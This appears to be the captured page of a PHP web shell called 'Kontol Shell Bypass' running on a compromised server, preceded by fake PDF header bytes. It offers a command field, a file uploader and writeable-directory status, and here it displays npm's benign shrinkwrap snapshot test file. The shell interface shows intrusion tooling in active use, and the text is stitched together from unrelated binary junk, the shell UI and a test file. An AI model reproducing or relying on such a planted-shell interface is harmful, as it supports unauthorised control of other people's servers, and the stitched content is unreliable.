%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /home/ubuntu/node-v16.18.1/deps/npm/tap-snapshots/test/lib/commands/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ubuntu/node-v16.18.1/deps/npm/tap-snapshots/test/lib/commands/shrinkwrap.js.test.cjs
/* IMPORTANT
 * This snapshot file is auto-generated, but designed for humans.
 * It should be checked into source control and tracked carefully.
 * Re-generate by setting TAP_SNAPSHOT=1 and running tests.
 * Make sure to inspect the output below.  Do not ignore changes!
 */
'use strict'
exports[`test/lib/commands/shrinkwrap.js TAP with hidden lockfile ancient > must match snapshot 1`] = `
{
  "localPrefix": {
    "node_modules": {
      ".package-lock.json": {
        "lockfileVersion": 1
      }
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 1,
    "requires": true
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with hidden lockfile ancient upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "node_modules": {
      ".package-lock.json": {
        "lockfileVersion": 1
      }
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {}
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json with version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with hidden lockfile existing > must match snapshot 1`] = `
{
  "localPrefix": {
    "node_modules": {
      ".package-lock.json": {
        "lockfileVersion": 2
      }
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {}
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with hidden lockfile existing downgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "node_modules": {
      ".package-lock.json": {
        "lockfileVersion": 2
      }
    }
  },
  "config": {
    "lockfile-version": 1
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 1,
    "requires": true
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json with version 1"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with hidden lockfile existing upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "node_modules": {
      ".package-lock.json": {
        "lockfileVersion": 2
      }
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {}
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json with version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with nothing ancient > must match snapshot 1`] = `
{
  "localPrefix": {},
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {}
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json with version 2"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with nothing ancient upgrade > must match snapshot 1`] = `
{
  "localPrefix": {},
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {}
  },
  "logs": [
    "created a lockfile as npm-shrinkwrap.json with version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with npm-shrinkwrap.json ancient > must match snapshot 1`] = `
{
  "localPrefix": {
    "npm-shrinkwrap.json": {
      "lockfileVersion": 1
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "npm-shrinkwrap.json updated to version 2"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with npm-shrinkwrap.json ancient upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "npm-shrinkwrap.json": {
      "lockfileVersion": 1
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "npm-shrinkwrap.json updated to version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with npm-shrinkwrap.json existing > must match snapshot 1`] = `
{
  "localPrefix": {
    "npm-shrinkwrap.json": {
      "lockfileVersion": 2
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "npm-shrinkwrap.json up to date"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with npm-shrinkwrap.json existing downgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "npm-shrinkwrap.json": {
      "lockfileVersion": 2
    }
  },
  "config": {
    "lockfile-version": 1
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 1,
    "requires": true
  },
  "logs": [
    "npm-shrinkwrap.json updated to version 1"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with npm-shrinkwrap.json existing upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "npm-shrinkwrap.json": {
      "lockfileVersion": 2
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "npm-shrinkwrap.json updated to version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with package-lock.json ancient > must match snapshot 1`] = `
{
  "localPrefix": {
    "package-lock.json": {
      "lockfileVersion": 1
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "package-lock.json has been renamed to npm-shrinkwrap.json and updated to version 2"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with package-lock.json ancient upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "package-lock.json": {
      "lockfileVersion": 1
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "package-lock.json has been renamed to npm-shrinkwrap.json and updated to version 3"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with package-lock.json existing > must match snapshot 1`] = `
{
  "localPrefix": {
    "package-lock.json": {
      "lockfileVersion": 2
    }
  },
  "config": {},
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 2,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "package-lock.json has been renamed to npm-shrinkwrap.json"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with package-lock.json existing downgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "package-lock.json": {
      "lockfileVersion": 2
    }
  },
  "config": {
    "lockfile-version": 1
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 1,
    "requires": true
  },
  "logs": [
    "package-lock.json has been renamed to npm-shrinkwrap.json and updated to version 1"
  ]
}
`

exports[`test/lib/commands/shrinkwrap.js TAP with package-lock.json existing upgrade > must match snapshot 1`] = `
{
  "localPrefix": {
    "package-lock.json": {
      "lockfileVersion": 2
    }
  },
  "config": {
    "lockfile-version": 3
  },
  "shrinkwrap": {
    "name": "prefix",
    "lockfileVersion": 3,
    "requires": true,
    "packages": {
      "": {
        "name": "prefix"
      }
    }
  },
  "logs": [
    "package-lock.json has been renamed to npm-shrinkwrap.json and updated to version 3"
  ]
}
`

Kontol Shell Bypass